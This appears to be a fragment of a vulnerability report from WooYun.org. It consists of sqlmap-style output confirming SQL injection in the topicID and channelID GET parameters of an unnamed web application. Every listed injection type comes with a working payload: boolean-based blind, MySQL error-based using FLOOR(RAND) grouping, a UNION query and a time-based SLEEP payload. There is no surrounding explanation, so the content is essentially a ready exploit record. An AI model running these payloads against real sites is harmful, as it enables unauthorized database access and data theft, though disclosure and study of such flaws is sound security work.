WooYun.org

Place: GET
Parameter: topicID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: channelID=2&topicID=18 AND 7368=7368
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: channelID=2&topicID=18 AND (SELECT 1676 FROM(SELECT COUNT(*),CONCAT(0x71666b6971,(SELECT (CASE WHEN (1676=1676) THEN 1 ELSE 0 END)),0x71726b6871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Place: GET
Parameter: channelID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: channelID=2 AND 9418=9418&topicID=18
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: channelID=2 AND (SELECT 5264 FROM(SELECT COUNT(*),CONCAT(0x71666b6971,(SELECT (CASE WHEN (5264=5264) THEN 1 ELSE 0 END)),0x71726b6871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&topicID=18
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: channelID=-8971 UNION ALL SELECT CONCAT(0x71666b6971,0x73546871627650496854,0x71726b6871)#&topicID=18
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: channelID=2 AND SLEEP(5)&topicID=18